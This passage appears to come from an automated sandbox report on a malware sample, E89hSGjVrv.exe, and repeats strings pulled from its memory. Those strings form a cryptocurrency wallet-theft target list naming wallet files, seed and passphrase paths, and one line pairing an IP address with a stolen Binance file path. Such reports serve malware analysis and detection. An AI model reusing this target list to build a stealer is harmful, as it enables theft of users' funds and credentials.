Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 185.215.113.16fons\AppData\Roaming\Binance\.finger-print.fpml
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session 